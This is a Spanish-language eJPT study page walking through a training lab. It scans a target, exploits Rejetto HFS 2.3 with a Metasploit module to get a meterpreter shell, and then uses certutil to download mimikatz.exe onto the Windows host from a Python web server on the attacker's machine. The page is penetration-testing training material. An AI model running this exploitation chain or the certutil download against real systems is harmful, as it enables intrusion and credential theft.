> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/transferencia-de-archivos/transferencia-de-archivos-a-destinos-windows.md).

# Transferencia de archivos a destinos windows

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/QABRSbpH5S4UyjZXDSRR" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/Bf8R8xlQbJRuMgUev1pm" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Escaneo de puertos con Nmap

Antes de que podamos comenzar a realizar la enumeración local, necesitaremos obtener acceso al sistema de destino.

Para empezar, necesitaremos identificar un servicio vulnerable que se esté ejecutando en el sistema de destino Windows, esto se puede hacer realizando un escaneo de detección de versión de servicio con Nmap.

**Dominio:**

```
nmap -sV demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el escaneo de Nmap revela que hay un servidor web ejecutándose en el puerto 80.

<figure><img src="/files/sNy8AvwoYQQo3yb0QVKM" alt=""><figcaption></figcaption></figure>

**Paso 4:** Búsqueda de exploits con Searchsploit

El escaneo de Nmap reveló que el puerto 80 está ejecutando **Rejetto HTTP File Server 2.3** , podemos buscar exploits que afecten a esta versión de **Rejetto HTTP File Server** con una herramienta como Searchsploit ejecutando el siguiente comando:

**Dominio:**

```
searchsploit rejetto
```

Como se muestra en la siguiente captura de pantalla, Searchsploit revela que hay un módulo de explotación de Metasploit Framework que se puede utilizar para explotar esta versión específica del **servidor de archivos HTTP Rejetto** .

<figure><img src="/files/o7qDP4JG1b4tudGNzOMf" alt=""><figcaption></figcaption></figure>

**Paso 5:** Obtener acceso

Para utilizar este módulo de exploit, necesitaremos iniciar la Consola Metasploit Framework (msfconsole), esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
msfconsole
```

Después de iniciar **msfconsole** , podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use exploit/windows/http/rejetto_hfs_exec
```

Ahora tendremos que configurar las opciones del módulo; más específicamente, establecer la dirección de destino. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
set RHOSTS demo.ine.local
```

Después de configurar las opciones del módulo, podemos ejecutar el módulo de exploit ejecutando el siguiente comando:

**Dominio:**

```
exploit
```

Como se muestra en la siguiente captura de pantalla, el módulo de explotación se ejecuta con éxito y nos proporciona una sesión **de meterpreter** en el sistema de destino.

<figure><img src="/files/ySESEk97lAfswr50fU1i" alt=""><figcaption></figcaption></figure>

Ahora que hemos obtenido acceso al sistema de destino de Windows, podemos explorar el proceso de transferencia de archivos al sistema Windows.

**Paso 6:** Transferencia de archivos al destino de Windows

En este caso, transferiremos el ejecutable mimikatz.exe que se encuentra en el directorio **/usr/share/windows-resources/mimikatz/x64** del sistema Kali Linux.

Para empezar, podemos navegar al directorio ejecutando el siguiente comando:

**Dominio:**

```
cd /usr/share/windows-resources/mimikatz/x64
```

Luego podemos iniciar un servidor web con **Python3** en este directorio ejecutando el siguiente comando:

**Dominio:**

```
python3 -m http.server 80
```

<figure><img src="/files/oiZ5BdEG4O0OHYUK03PH" alt=""><figcaption></figcaption></figure>

Ahora podemos regresar a la sesión **de meterpreter** en el sistema de destino, acceder a la unidad C:\ y crear el directorio **temporal** . Esto se puede hacer ejecutando los siguientes comandos:

**Dominio:**

```
cd C:\\
```

**Dominio:**

```
mkdir Temp
```

**Dominio:**

```
cd Temp
```

Ahora necesitaremos generar una sesión de shell de comandos en el sistema de destino ejecutando el siguiente comando:

**Dominio:**

```
shell
```

Ahora podemos descargar el ejecutable **mimikatz.exe** desde el servidor web alojado en el sistema Kali Linux ejecutando el siguiente comando:

**Dominio:**

```
certutil -urlcache -f http://10.10.31.3/mimikatz.exe mimikatz.exe
```

Como se muestra en la siguiente captura de pantalla, el ejecutable **mimikatz.exe** se descarga correctamente en el sistema Windows.

<figure><img src="/files/oh2v6gZdIBDWcxbaECiM" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, exploramos el proceso de transferencia de archivos desde un servidor web alojado en Kali Linux a un destino Windows con la utilidad certutil.
